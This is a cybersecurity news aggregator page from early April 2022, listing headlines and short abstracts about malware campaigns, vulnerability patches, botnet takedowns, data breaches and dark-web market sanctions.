Abstract As many as seven malicious Android apps discovered on the Google Play Store masqueraded as antivirus solutions to deploy a banking trojan called SharkBot. "SharkBot steals credentials and banking information," Check Point researchers Alex Shamshur and Raman Ladutska said in a report shared with The Hacker News. "This malware implements a geofencing feature and evasion techniques, which makes it stand out from the rest of malwares." Particularly, the malware is designed to ignore users from China, India, Romania, Russia, Ukraine, and Belarus. The rogue apps are said to have been installed more than 15,000 times prior to their removal, with most of the victims located in Italy and the U.K. The report complements previous findings from NCC Group, which found the bankbot posing as antivirus apps to carry out unauthorized transactions via Automatic Transfer Systems (ATS). SharkBot takes advantage of Android's Accessibility Services permissions to present

The Hacker News

April 7, 2022 – Vulnerabilities

VMware addressed several critical vulnerabilities in multiple products Full Text

Abstract VMware fixed critical vulnerabilities in multiple products that could be exploited by remote attackers to execute arbitrary code. VMware has addressed critical remote code vulnerabilities in multiple products, including VMware’s Workspace ONE Access,...

Security Affairs

April 07, 2022 – Malware

Malicious web redirect service infects 16,500 sites to push malware Full Text

Abstract A new TDS (Traffic Direction System) operation called Parrot has emerged in the wild, having already infected servers hosting 16,500 websites of universities, local governments, adult content platforms, and personal blogs.

BleepingComputer

April 7, 2022 – Hacker

Deep Panda Uses Fire Chili Windows Rootkit Full Text

Abstract Deep Panda was found exploiting Log4Shell to deploy the new Fire Chili rootkit in compromised networks of organizations in the travel, finance, and cosmetic industries. Fire Chili helps keep file operations, registry key additions, processes, and malicious network connections concealed from the us ...

Cyware Alerts - Hacker News

April 07, 2022 – Malware

Researchers Uncover How Colibri Malware Stays Persistent on Hacked Systems Full Text

Abstract Cybersecurity researchers have detailed a "simple but efficient" persistence mechanism adopted by a relatively nascent malware loader called Colibri, which has been observed deploying a Windows information stealer known as Vidar as part of a new campaign. "The attack starts with a malicious Word document deploying a Colibri bot that then delivers the Vidar Stealer," Malwarebytes Labs said in an analysis. "The document contacts a remote server at (securetunnel[.]co) to load a remote template named 'trkal0.dot' that contacts a malicious macro," the researchers added. First documented by FR3D.HK and Indian cybersecurity company CloudSEK earlier this year, Colibri is a malware-as-a-service (MaaS) platform that's engineered to drop additional payloads onto compromised systems. Early signs of the loader appeared on Russian underground forums in August 2021. "This loader has multiple techniques that help avoid detection," CloudSEK r

The Hacker News

April 07, 2022 – Attack

Bearded Barbie hackers catfish high ranking Israeli officials Full Text

Abstract The Hamas-backed hacking group tracked as 'APT-C-23' was found catfishing Israeli officials working in defense, law enforcement, and government agencies, ultimately leading to the deployment of new malware.

BleepingComputer

April 7, 2022 – Hacker

A Bad Luck BlackCat Full Text

Abstract Kaspersky claims that at least some members of the new BlackCat group have links to the BlackMatter group, because they modified and reused a custom exfiltration tool Kaspersky calls Fendr, which has only been observed in BlackMatter activity.

Securelist

April 07, 2022 – Botnet

FBI Shut Down Russia-linked “Cyclops Blink” Botnet That Infected Thousands of Devices Full Text

Abstract The U.S. Department of Justice (DoJ) announced that it neutralized Cyclops Blink, a modular botnet controlled by a threat actor known as Sandworm, which has been attributed to the Main Intelligence Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU). "The operation copied and removed malware from vulnerable internet-connected firewall devices that Sandworm used for command-and-control (C2) of the underlying botnet," the DoJ said in a statement Wednesday. In addition to disrupting its C2 infrastructure, the operation also closed the external management ports that the threat actor used to establish connections with the firewall appliances, effectively severing contact and preventing the hacking group from using the infected devices to commandeer the botnet. The March 22 court-authorized disruption of Cyclops Blink comes a little over a month after intelligence agencies in the U.K. and the U.S. described the botnet as a replacement fram

The Hacker News

April 07, 2022 – Malware

Android apps with 45 million installs used data harvesting SDK Full Text

Abstract Mobile malware analysts warn about a set of applications available on the Google Play Store, which collected sensitive user data from over 45 million devices.

BleepingComputer

April 7, 2022 – General

How many steps does it take for attackers to compromise critical assets? Full Text

Abstract The XM Cyber research team analyzed the methods, attack paths and impacts of attack techniques that imperil critical assets across on-prem, multi-cloud and hybrid environments.

Help Net Security

April 7, 2022 – Business

VPN Provider Nord Security Reaches Unicorn Status With $100 Million Funding Full Text

Abstract Lithuania-based Nord Security has raised $100 million in its first ever outside capital funding with a financing round led by Novator Ventures, and participation from Burda Principal Investments and General Catalyst.

Security Week

April 06, 2022 – Vulnerabilities

VMware Releases Critical Patches for New Vulnerabilities Affecting Multiple Products Full Text

Abstract VMware has released security updates to patch eight vulnerabilities spanning its products, some of which could be exploited to launch remote code execution attacks. Tracked from CVE-2022-22954 to CVE-2022-22961 (CVSS scores: 5.3 - 9.8), the issues impact VMware Workspace ONE Access, VMware Identity Manager, VMware vRealize Automation, VMware Cloud Foundation, and vRealize Suite Lifecycle Manager. Five of the eight bugs are rated Critical, two are rated Important, and one is rated Moderate in severity. Credited with reporting all the vulnerabilities is Steven Seeley of Qihoo 360 Vulnerability Research Institute. The list of flaws is below: CVE-2022-22954 (CVSS score: 9.8) - Server-side template injection remote code execution vulnerability affecting VMware Workspace ONE Access and Identity Manager; CVE-2022-22955 & CVE-2022-22956 (CVSS scores: 9.8) - OAuth2 ACS authentication bypass vulnerabilities in VMware Workspace ONE Access; CVE-2022-22957 & CVE-2022-22958 (CVS

The Hacker News

April 06, 2022 – Vulnerabilities

Palo Alto Networks firewalls, VPNs vulnerable to OpenSSL bug Full Text

Abstract American cybersecurity company Palo Alto Networks warned customers on Wednesday that some of its firewall, VPN, and XDR products are vulnerable to a high-severity OpenSSL infinite loop bug disclosed three weeks ago.

BleepingComputer

April 6, 2022 – Malware

New Denonia Malware Targets AWS Lambda Environments Full Text

Abstract Lambda is a scalable compute service offered by Amazon Web Services (AWS) for running code, server and OS maintenance, capacity provisioning, logging, and operating numerous backend services.

ZDNet

April 06, 2022 – Education

Cyber Security WEBINAR — How to Ace Your InfoSec Board Deck Full Text

Abstract Communication is a vital skill for any leader at an organization, regardless of seniority. For security leaders, this goes double. Communicating clearly works on multiple levels. On the one hand, security leaders and CISOs must be able to communicate strategies clearly – instructions, incident response plans, and security policies. On the other, they must be able to communicate the importance of security and the value of having robust defenses to the C-level. For CISOs and other security leaders, this latter skill is crucial but often overlooked or not prioritized. A new webinar, "How to ace your Infosec board deck," looks to shed light on both the importance of being able to communicate clearly with management, and key strategies to do so effectively. The webinar will feature a conversation with vCISO and Cybersecurity Consultant Dr. Eric Cole, as well as Norwest Venture Partners General Partner Dave Zilberman. More so than just talking about the dollar value of a sec

The Hacker News

April 6, 2022 – Botnet

US dismantled the Russia-linked Cyclops Blink botnet Full Text

Abstract The U.S. government announced the disruption of the Cyclops Blink botnet operated by the Russia-linked Sandworm APT group. The U.S. government announced that it had dismantled the Cyclops Blink botnet operated by the Russia-linked Sandworm APT group....

Security Affairs

April 6, 2022 – Phishing

Attackers Spoof WhatsApp Voice-Message Alerts to Steal Info Full Text

Abstract Threat actors target Office 365 and Google Workspace in a new campaign, which uses a legitimate domain associated with a road-safety center in Moscow to send messages.

Threatpost

April 06, 2022 – Malware

New FFDroider malware steals Facebook, Instagram, Twitter accounts Full Text

Abstract A new information stealer named FFDroider has emerged, stealing credentials and cookies stored in browsers to hijack victims' social media accounts.

BleepingComputer

April 6, 2022 – Breach

Texas Department of Insurance Exposed Data of 1.8 Million People Full Text

Abstract The exposed information includes names, addresses, phone numbers, dates of births, and partial or full social security numbers, as well as information about injuries and worker compensation claims.

Security Week

April 06, 2022 – Malware

Hackers Distributing Fake Shopping Apps to Steal Banking Data of Malaysian Users Full Text

Abstract Threat actors have been distributing malicious applications under the guise of seemingly harmless shopping apps to target customers of eight Malaysian banks since at least November 2021. The attacks involved setting up fraudulent but legitimate-looking websites to trick users into downloading the apps, Slovak cybersecurity firm ESET said in a report shared with The Hacker News. The copycat websites impersonated cleaning services such as Maid4u, Grabmaid, Maria's Cleaning, Maid4u, YourMaid, Maideasy and MaidACall and a pet store named PetsMore, all of which are aimed at users in Malaysia. "The threat actors use these fake e-shop applications to phish for banking credentials," ESET said. "The apps also forward all SMS messages received by the victim to the malware operators in case they contain 2FA codes sent by the bank." The targeted banks include Maybank, Affin Bank, Public Bank Berhad, CIMB bank, BSN, RHB, Bank Islam Malaysia, and Hong Leong Bank. Th

The Hacker News

April 6, 2022 – Attack

Ukraine warns of attacks aimed at taking over Telegram accounts Full Text

Abstract Ukraine's technical security and intelligence service warns of threat actors aiming to gain access to users' Telegram accounts. The State Service of Special Communication and Information Protection (SSSCIP) of Ukraine spotted a new wave of cyber...

Security Affairs

April 06, 2022 – Outage

UK retail chain The Works shuts down stores after cyberattack Full Text

Abstract British retail chain The Works announced it was forced to shut down several stores due to till issues caused by a cyber-security incident involving unauthorized access to its computer systems.

BleepingComputer

April 6, 2022 – Business

Tufin Enters Into Definitive Agreement to be Acquired by Turn/River Capital in a $570 million Transaction Full Text

Abstract Tufin announced that it has entered into a definitive agreement to be acquired by Turn/River Capital, a software-focused investment firm, in an all-cash transaction that values the company at about $570 million.

Yahoo! Finance

April 06, 2022 – Government

Ukraine Warns of Cyber attack Aiming to Hack Users’ Telegram Messenger Accounts Full Text

Abstract Ukraine's technical security and intelligence service is warning of a new wave of cyber attacks that are aimed at gaining access to users' Telegram accounts. "The criminals sent messages with malicious links to the Telegram website in order to gain unauthorized access to the records, including the possibility to transfer a one-time code from SMS," the State Service of Special Communication and Information Protection (SSSCIP) of Ukraine said in an alert. The attacks, which have been attributed to a threat cluster called "UAC-0094," originate with Telegram messages alerting recipients that a login had been detected from a new device located in Russia and urging the users to confirm their accounts by clicking on a link. The URL, in reality a phishing domain, prompts the victims to enter their phone numbers as well as the one-time passwords sent via SMS that are then used by the threat actors to take over the accounts. The modus operandi mirrors that

The Hacker News

April 6, 2022 – Breach

Block discloses data breach involving Cash App potentially impacting 8.2 million US customers Full Text

Abstract Block disclosed a data breach related to the Cash App investing app and is notifying 8.2 million current and former US customers. The data breach involved a former employee that downloaded some unspecified reports of its Cash App Investing app that...

Security Affairs

April 06, 2022 – Vulnerabilities

VMware warns of critical vulnerabilities in multiple products Full Text

Abstract VMware has warned customers to immediately patch critical vulnerabilities in multiple products that could be used by threat actors to launch remote code execution attacks.

BleepingComputer

April 6, 2022 – Government

Australia to develop a data security framework Full Text

Abstract The Australian Department of Home Affairs has commenced work on a new national data security action plan as part of the federal government's wider digital economy strategy.

ZDNet

April 06, 2022 – Insider Threat

Block Admits Data Breach Involving Cash App Data Accessed by Former Employee Full Text

Abstract Block, the company formerly known as Square, has disclosed a data breach that involved a former employee downloading unspecified reports pertaining to its Cash App Investing that contained information about its U.S. customers. "While this employee had regular access to these reports as part of their past job responsibilities, in this instance these reports were accessed without permission after their employment ended," the firm revealed in an April 4 filing with the U.S. Securities and Exchange Commission (SEC). Block advertises Cash App as "the easiest way to send money, spend money, save money, and buy cryptocurrency." The breach is said to have occurred last year on December 10, 2021, with the downloaded reports including customers' full names as well as their brokerage account numbers, and in some cases, brokerage portfolio value, brokerage portfolio holdings, and stock trading activity for one trading day. The San Francisco-based company emphasized

The Hacker News

April 6, 2022 – Policy and Law

U.S. Treasury Department sanctions darkweb marketplace Hydra Market Full Text

Abstract The U.S. Treasury Department sanctioned the Hydra Market, the world's largest and longest-running dark web marketplace. The U.S. Treasury Department sanctioned the darkweb marketplace Hydra Market, the same day Germany’s Federal Criminal Police...

Security Affairs

April 06, 2022 – Botnet

US disrupts Russian Cyclops Blink botnet before being used in attacks Full Text

Abstract US government officials announced today the disruption of the Cyclops Blink botnet controlled by the Russian-backed Sandworm hacking group before being used in attacks.

BleepingComputer

April 6, 2022 – Education

Digital transformation requires security intelligence Full Text

Abstract It’s no surprise that many organizations are struggling with how to best manage their data and secure it, especially when data and systems reside not only in separate siloes, but within different teams, on-premises, and in the cloud.

Help Net Security

April 06, 2022 – Government

U.S. Treasury Department Sanctions Russia-based Hydra Darknet Marketplace Full Text

Abstract The U.S. Treasury Department on Tuesday sanctioned Hydra, the same day German law enforcement authorities disrupted the world's largest and longest-running dark web marketplace following a coordinated operation in partnership with U.S. officials. The sanctions are part of an "international effort to disrupt proliferation of malicious cybercrime services, dangerous drugs, and other illegal offerings available through the Russia-based site," the Treasury Department said in a statement. Along with the sanctions, the Office of Foreign Assets Control (OFAC) disclosed a list of more than 100 virtual currency addresses that have been identified as associated with the entity's operations to conduct illicit transactions. The sanctions come as Germany's Federal Criminal Police Office shut down the online criminal marketplace that it said specialized in narcotics trade, seizing its servers and 543 bitcoins worth 23 million euros ($25.3 million). Hydra was a Russi

The Hacker News

April 6, 2022 – Outage

A cyber attack forced the wind turbine manufacturer Nordex Group to shut down some of its IT systems Full Text

Abstract Nordex Group, one of the largest manufacturers of wind turbines, was hit by a cyberattack that forced the company to shut down part of its infrastructure. Nordex Group, one of the world’s largest manufacturers of wind turbines, was the victim...

Security Affairs

April 06, 2022 – Criminals

U.S. sanctions crypto-exchange Garantex for aiding Hydra Market Full Text

Abstract The U.S. Department of the Treasury has announced sanctions against the cryptocurrency exchange Garantex, which has been linked to illegal transactions for Hydra Market.

BleepingComputer

April 6, 2022 – Malware

Fake Android Shopping Applications Steal Bank Account Logins, 2FA Codes Full Text

Abstract On Wednesday, ESET's cybersecurity team published new research documenting three separate fake apps targeting customers who belong to eight Malaysian banks to steal their account logins.

ZDNet

April 6, 2022 – Policy and Law

Germany police shut down Hydra Market dark web marketplace Full Text

Abstract Germany's Federal Criminal Police Office shut down Hydra Market, the Russian-language darknet marketplace specialized in drug dealing. Germany's Federal Criminal Police Office, the Bundeskriminalamt (BKA), announced they have shut down Hydra, one of the world's...

Security Affairs

April 6, 2022 – Vulnerabilities

Cyber Threats at Retail Endpoints Giving Way to Data Theft Full Text

Abstract Although e-Commerce sites are frequently targeted by cyberattackers, there isn't much attention paid to the cybersecurity measures at brick-and-mortar retailers. Hackers target local stores for a variety of reasons including personal data theft, skimming payment card details, and sometimes extorti ...

Cyware Alerts - Hacker News

April 05, 2022 – Phishing

Ukraine: Russian Armageddon phishing targets EU govt agencies Full Text

Abstract The Computer Emergency Response Team of Ukraine (CERT-UA) has spotted new phishing attempts attributed to the Russian threat group tracked as Armageddon (Gamaredon).

BleepingComputer

April 05, 2022 – Phishing

Australia warns of money recovery phishing luring past victims Full Text

Abstract The Australian Competition & Consumer Commission has published an announcement to raise awareness about a spike in money recovery scams.

BleepingComputer

April 5, 2022 – Ransomware

IPfuscation is Hive’s New Technique to Evade Detection Full Text

Abstract Hive ransomware gang is using a new IPfuscation tactic to hide its payload wherein they hide 64-bit Windows executables in the form of an array of ASCII IPv4 addresses. Additionally, the researchers spotted additional IPfuscation variants using IPv6 instead of IPv4 addresses, UUIDs, and MAC addres ...

Cyware Alerts - Hacker News

April 05, 2022 – Hacker

FIN7 Hackers Leveraging Password Reuse and Software Supply Chain Attacks Full Text

Abstract The notorious cybercrime group known as FIN7 has diversified its initial access vectors to incorporate software supply chain compromise and the use of stolen credentials, new research has revealed. "Data theft extortion or ransomware deployment following FIN7-attributed activity at multiple organizations, as well as technical overlaps, suggests that FIN7 actors have been associated with various ransomware operations over time," incident response firm Mandiant said in a Monday analysis. The cybercriminal group, since its emergence in the mid-2010s, has gained notoriety for large-scale malware campaigns targeting the point-of-sale (POS) systems aimed at restaurant, gambling, and hospitality industries with credit card-stealing malware. FIN7's shift in monetization strategy towards ransomware follows an October 2021 report from Recorded Future's Gemini Advisory unit, which found the adversary setting up a fake front company named Bastion Secure to recruit unwitt

The Hacker News

April 5, 2022 – APT

Russia-linked Armageddon APT targets Ukrainian state organizations, CERT-UA warns Full Text

Abstract Ukraine CERT-UA spotted a spear-phishing campaign conducted by Russia-linked Armageddon APT targeting local state organizations. Ukraine CERT-UA published a security advisory to warn of spear-phishing attacks conducted by Russia-linked Armageddon...

Security Affairs

April 05, 2022 – Breach

Cash App notifies 8.2 million US customers about data breach Full Text

Abstract Cash App is notifying 8.2 million current and former US customers of a data breach after a former employee accessed their account information.

BleepingComputer

April 5, 2022 – Botnet

Beastmode Botnet Adds New Exploits to its Arsenal Full Text

Abstract According to Fortinet, BeastMode attempts to infect TOTOLINK routers by exploiting several vulnerabilities. The threat actors added the exploits just a week after the PoCs were publicly released on GitHub.

Cyware Alerts - Hacker News

April 05, 2022 – Education

Battling Cybersecurity Risk: How to Start Somewhere, Right Now Full Text

Abstract Between a series of recent high-profile cybersecurity incidents and the heightened geopolitical tensions, there's rarely been a more dangerous cybersecurity environment. It's a danger that affects every organization – automated attack campaigns don't discriminate between targets. The situation is driven in large part due to a relentless rise in vulnerabilities, with tens of thousands of brand-new vulnerabilities discovered every year. For tech teams that are probably already under-resourced, guarding against this rising tide of threats is an impossible task. Yet, in the battle against cybercrime, some of the most effective and most sensible mitigations are sometimes neglected. In this article, we'll outline why cybersecurity risks have escalated so dramatically – and which easy wins your organization can make for a significant difference in your cybersecurity posture, right now. Recent major cyberattacks point to the danger Cyber security has arguably never been mo

The Hacker News

April 5, 2022 – Attack

Anonymous targets the Russian Military and State Television and Radio propaganda Full Text

Abstract Anonymous continues to support Ukraine against the Russian criminal invasion targeting the Russian military and propaganda. Anonymous leaked personal details of the Russian military stationed in Bucha where the Russian military carried out a massacre...

Security Affairs

April 05, 2022 – Hacker

Chinese hackers abuse VLC Media Player to launch malware loader Full Text

Abstract Security researchers have uncovered a long-running malicious campaign from hackers associated with the Chinese government who are using VLC Media Player to launch a custom malware loader.

BleepingComputer

April 5, 2022 – Business

Coro secures $60M at ~$500M valuation for an all-in, SaaS-based cyber protection platform aimed at SMBs Full Text

Abstract Alongside this latest round, the company is also disclosing for the first time an additional $20 million raised in the last six months, bringing the total to $80 million in the period.

Tech Crunch

April 05, 2022 – Criminals

Germany Shuts Down Russian Hydra Darknet Market; Seizes $25 Million in Bitcoin Full Text

Abstract Germany's Federal Criminal Police Office, the Bundeskriminalamt (BKA), on Tuesday announced the official takedown of Hydra, the world's largest illegal dark web marketplace that has cumulatively facilitated over $5 billion in Bitcoin transactions to date. "Bitcoins amounting to currently the equivalent of approximately €23 million were seized, which are attributed to the marketplace," the BKA said in a press release. Blockchain analytics firm Elliptic confirmed that the seizure occurred on April 5, 2022 in a series of 88 transactions amounting to 543.3 BTC. The agency attributed the shutdown of Hydra to an extensive investigation operation conducted by its Central Office for Combating Cybercrime (ZIT) in partnership with U.S. law enforcement authorities since August 2021. Launched in 2015, Hydra was a Russian-language darknet marketplace that opened as a competitor to the now-defunct Russian Anonymous Marketplace (aka RAMP), primarily known for its high-traffic

The Hacker News

April 5, 2022 – Vulnerabilities

CISA adds Spring4Shell flaw to its Known Exploited Vulnerabilities Catalog Full Text

Abstract The U.S. CISA added the recently disclosed remote code execution (RCE) vulnerability Spring4Shell to its Known Exploited Vulnerabilities Catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the recently disclosed CVE-2022-22965 (aka...

Security Affairs

April 05, 2022 – Vulnerabilities

SpringShell attacks target about one in six vulnerable orgs Full Text

Abstract Roughly one out of six organizations worldwide that are impacted by the Spring4Shell zero-day vulnerability have already been targeted by threat actors, according to statistics from one cybersecurity company.

BleepingComputer

April 5, 2022 – Malware

AsyncRAT campaigns feature new version of 3LOSH crypter Full Text

Abstract The threat actor(s) behind these campaigns have been using 3LOSH to generate the obfuscated code responsible for the initial infection process. The same operator is likely distributing a variety of commodity RATs, such as AsyncRAT and LimeRAT.

Cisco Talos

April 05, 2022 – Attack

Researchers Trace Widespread Espionage Attacks Back to Chinese ‘Cicada’ Hackers Full Text

Abstract A Chinese state-backed advanced persistent threat (APT) group known for singling out Japanese entities has been attributed to a new long-running espionage campaign targeting new geographies, suggesting a "widening" of the threat actor's targeting. The widespread intrusions, which are believed to have commenced at the earliest in mid-2021 and continued as recently as February 2022, have been tied to a group tracked as Cicada, which is also known as APT10, Stone Panda, Potassium, Bronze Riverside, or MenuPass Team. "Victims in this Cicada (aka APT10) campaign include government, legal, religious, and non-governmental organizations (NGOs) in multiple countries around the world, including in Europe, Asia, and North America," researchers from the Symantec Threat Hunter Team, part of Broadcom Software, said in a report shared with The Hacker News. "There is a strong focus on victims in the government and NGO sectors, with some of these organizations worki

The Hacker News

April 5, 2022 – Breach

MailChimp breached, intruders conducted phishing attacks against crypto customers Full Text

Abstract Threat actors gained access to internal tools of the email marketing giant MailChimp to conduct phishing attacks against crypto customers. During the weekend, multiple owners of Trezor hardware cryptocurrency wallets reported having received...

Security Affairs

April 05, 2022 – Attack

Microsoft detects Spring4Shell attacks across its cloud services Full Text

Abstract Microsoft said that it's currently tracking a "low volume of exploit attempts" targeting the critical Spring4Shell (aka SpringShell) remote code execution (RCE) vulnerability across its cloud services.

BleepingComputer

April 5, 2022 – Outage

The Works hit by hackers, UK retailer shuts some stores after problems with payment tills Full Text

Abstract UK high street retailer The Works was forced to shut some of its stores following a "cyber security incident" which saw hackers gaining unauthorized access to its systems.

Bit Defender

April 05, 2022 – General

Is API Security on Your Radar? Full Text

Abstract With the growth in digital transformation, the API management market is set to grow by more than 30% by the year 2025 as more businesses build web APIs and consumers grow to rely on them for everything from mobile apps to customized digital services. As part of strategic business planning, an API helps generate revenue by allowing customers access to the functionality of a website or computer program through custom applications. As more and more businesses are implementing APIs, the risk of API attacks increases. By 2022, Gartner predicted that API (Application Programming Interface) attacks would become the most common attack vector for enterprise web applications. Cybercriminals are targeting APIs more aggressively than ever before, and businesses must take a proactive approach to API security to combat this new aggression. API and The Business World With integrating APIs into modern IT environments, businesses are becoming increasingly data-driven. Just as a restaurant

The Hacker News

April 05, 2022 – Vulnerabilities

Microsoft adds on-premises Exchange, SharePoint to bug bounty program Full Text

Abstract Microsoft has announced that Exchange, SharePoint, and Skype for Business on-premises are now part of the Applications and On-Premises Servers Bounty Program starting today.

BleepingComputer

April 5, 2022 – Malware

Thwarting Loaders: From SocGholish to BLISTER’s LockBit Payload Full Text

Abstract SocGholish has been around longer than BLISTER, having already established itself well among threat actors for its advanced delivery framework. Reports show that its framework of attack has previously been used by threat actors from as early as 2020.

Trend Micro

April 05, 2022 – Breach

Hackers Breach Mailchimp Email Marketing Firm to Launch Crypto Phishing Scams Full Text

Abstract Email marketing service Mailchimp on Monday revealed a data breach that resulted in the compromise of an internal tool to gain unauthorized access to customer accounts and stage phishing attacks. The development was first reported by Bleeping Computer. The company, which was acquired by financial software firm Intuit in September 2021, told the publication that it became aware of the incident on March 26 when it became aware of a malicious party accessing the customer support tool. "The incident was propagated by an external actor who conducted a successful social engineering attack on Mailchimp employees, resulting in employee credentials being compromised," Siobhan Smyth, Mailchimp's chief information security officer, was quoted as saying. Although Mailchimp stated it acted quickly to terminate access to the breached employee account, the siphoned credentials were used to access 319 MailChimp accounts and further export the mailing lists pertaining to 102 acc

The Hacker News

April 05, 2022 – Solution

Microsoft announces new Windows 11 security, encryption features Full Text

Abstract Microsoft says that Windows 11 will get more security improvements in upcoming releases, which will add more protection against cybersecurity threats, offer better encryption, and block malicious apps and drivers.

BleepingComputer

April 5, 2022

MacOS SUHelper Root Privilege Escalation Vulnerability: A Deep Dive Into CVE-2022-22639 Full Text

Abstract Designated as CVE-2022-22639, the vulnerability could allow root privilege escalation if successfully exploited. After discovering the flaw, we reported it to Apple, hence the release of a patch through the macOS Monterey 12.3 security update.

Trend Micro

April 05, 2022 – Government

CISA Warns of Active Exploitation of Critical Spring4Shell Vulnerability Full Text

Abstract The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added the recently disclosed remote code execution (RCE) vulnerability affecting the Spring Framework, to its Known Exploited Vulnerabilities Catalog based on "evidence of active exploitation." The critical severity flaw, assigned the identifier CVE-2022-22965 (CVSS score: 9.8) and dubbed "Spring4Shell", impacts Spring model–view–controller (MVC) and Spring WebFlux applications running on Java Development Kit 9 and later. "Exploitation requires an endpoint with DataBinder enabled (e.g., a POST request that decodes data from the request body automatically) and depends heavily on the servlet container for the application," Praetorian researchers Anthony Weems and Dallas Kaman noted last week. Although exact details of in-the-wild abuse remain unclear, information security company SecurityScorecard said "active scanning for this vulnerability has been observed coming fro

The Hacker News

April 05, 2022 – Phishing

Ukraine spots Russian-linked ‘Armageddon’ phishing attacks Full Text

Abstract The Computer Emergency Response Team of Ukraine (CERT-UA) has spotted new phishing attempts attributed to the Russian threat group tracked as Armageddon (Gamaredon).

BleepingComputer

April 5, 2022 – Vulnerabilities

Yokogawa Patches Flaws Allowing Disruption, Manipulation of Physical Processes Full Text

Abstract Japanese automation giant Yokogawa recently patched a series of vulnerabilities in control system products that, according to researchers, can be exploited for the disruption or manipulation of physical processes.

Security Week

April 04, 2022 – Malware

WhatsApp voice message phishing emails push info-stealing malware Full Text

Abstract A new WhatsApp phishing campaign impersonating WhatsApp's voice message feature has been discovered, attempting to spread information-stealing malware to at least 27,655 email addresses.

BleepingComputer

April 4, 2022 – Vulnerabilities

Serious RCE Bug Found in Spring Cloud Full Text

Abstract A serious vulnerability has been discovered in the Spring Cloud Java Framework that may lead to RCE or result in the compromise of an entire host. Tracked as Spring4Shell, it was found circulating on a Chinese cybersecurity site and QQ chat service. Currently, a way to partially stop Spring4Shell ...

Cyware Alerts - Hacker News

April 04, 2022 – Privacy

Researchers Uncover New Android Spyware With C2 Server Linked to Turla Hackers Full Text

Abstract An Android spyware application has been spotted masquerading as a "Process Manager" service to stealthily siphon sensitive information stored in the infected devices. Interestingly, the app — that has the package name "com.remote.app" — establishes contact with a remote command-and-control server, 82.146.35[.]240, which has been previously identified as infrastructure belonging to the Russia-based hacking group known as Turla. "When the application is run, a warning appears about the permissions granted to the application," Lab52 researchers said. "These include screen unlock attempts, lock the screen, set the device global proxy, set screen lock password expiration, set storage encryption and disable cameras." Once the app is "activated," the malware removes its gear-shaped icon from the home screen and runs in the background, abusing its wide permissions to access the device's contacts and call logs, track its location,

The Hacker News

April 4, 2022 – Vulnerabilities

VMware released updates to fix the Spring4Shell vulnerability in multiple products Full Text

Abstract VMware released security updates to address the critical remote code execution vulnerability known as Spring4Shell. VMware has published security updates to address the critical remote code execution vulnerability known as Spring4Shell (CVE-2022-22965)....

Security Affairs

April 04, 2022 – Solution

GitHub can now auto-block commits containing API keys, auth tokens Full Text

Abstract GitHub announced on Monday that it expanded its code hosting platform's secrets scanning capabilities for GitHub Advanced Security customers to automatically block secret leaks.

BleepingComputer

April 4, 2022 – Cryptocurrency

Mars Stealer’s Cryptomining Attack Campaign Targets OpenOffice Full Text

Abstract Morphisec laid bare a new Mars Stealer campaign—abusing Google Ads ranking techniques—to lure Canadian users into downloading a malicious version of OpenOffice. A bug in the configuration instructions of the cracked version of Mars Stealer, which appears to be an honest mistake by the operators, gi ...

Cyware Alerts - Hacker News

April 04, 2022 – Hacker

Multiple Hacker Groups Capitalizing on Ukraine Conflict for Distributing Malware Full Text

Abstract At least three different advanced persistent threat (APT) groups from across the world have launched spear-phishing campaigns in mid-March 2022 using the ongoing Russo-Ukrainian war as a lure to distribute malware and steal sensitive information. The campaigns, undertaken by El Machete, Lyceum, and SideWinder, have targeted a variety of sectors, including energy, financial, and governmental sectors in Nicaragua, Venezuela, Israel, Saudi Arabia, and Pakistan. "The attackers use decoys ranging from official-looking documents to news articles or even job postings, depending on the targets and region," Check Point Research said in a report. "Many of these lure documents utilize malicious macros or template injection to gain an initial foothold into the targeted organizations, and then launch malware attacks." The infection chains of El Machete, a Spanish-speaking threat actor first documented in August 2014 by Kaspersky, involve the use of macro-laced decoy doc

The Hacker News

April 4, 2022 – APT

Experts spotted a new Android malware while investigating Russia-linked Turla APT Full Text

Abstract Researchers spotted a new piece of Android malware while investigating activity associated with Russia-linked APT Turla. Researchers at cybersecurity firm Lab52 discovered a new piece of Android malware while investigating infrastructure associated...

Security Affairs

April 04, 2022 – Vulnerabilities

VMware patches Spring4Shell RCE flaw in multiple products Full Text

Abstract ​​​​​​​VMWare has published a security advisory for the critical remote code execution vulnerability known as Spring4Shell, which impacts multiple of its cloud computing and virtualization products.

BleepingComputer

April 4, 2022 – Vulnerabilities

Cisco software update blocks exploit chain in network management software Full Text

Abstract A security researcher was able to achieve unauthenticated remote code execution against Cisco Nexus Dashboard Fabric Controller by exploiting an obsolete Java library with known vulnerabilities.

The Daily Swig

April 04, 2022 – Vulnerabilities

Brokenwire Hack Could Let Remote Attackers Disrupt Charging for Electric Vehicles Full Text

Abstract A group of academics from the University of Oxford and Armasuisse S+T has disclosed details of a new attack technique against the popular Combined Charging System (CCS) that could potentially disrupt the ability to charge electric vehicles at scale. Dubbed "Brokenwire," the method interferes with the control communications that transpire between the vehicle and charger to wirelessly abort the charging sessions from a distance of as far as 47m (151ft). "While it may only be an inconvenience for individuals, interrupting the charging process of critical vehicles, such as electric ambulances, can have life-threatening consequences," the researchers explained. "Brokenwire has immediate implications for many of the 12 million battery EVs estimated to be on the roads worldwide — and profound effects on the new wave of electrification for vehicle fleets, both for private enterprise and for crucial public services." Additional details of the attack

The Hacker News

April 4, 2022 – Attack

Brokenwire attack, how hackers can disrupt charging for electric vehicles Full Text

Abstract Boffins devised a new attack technique, dubbed Brokenwire, against the Combined Charging System (CCS) that could potentially disrupt charging for electric vehicles. A group of researchers from the University of Oxford and Armasuisse S+T has devised...

Security Affairs

April 04, 2022 – Breach

Hackers breach MailChimp’s internal tools to target crypto customers Full Text

Abstract Email marketing firm MailChimp disclosed on Sunday that they had been hit by hackers who gained access to internal customer support and account management tools to steal audience data and conduct phishing attacks.

BleepingComputer

April 4, 2022 – Attack

Emma Sleep Company admits attack on online checkout Full Text

Abstract Emma Sleep Company has confirmed to The Reg that it suffered a Magecart attack which enabled the cybercriminals to skim customers' credit or debit card data from its website.

The Register

April 04, 2022 – Malware

Experts Shed Light on BlackGuard Infostealer Malware Sold on Russian Hacking Forums Full Text

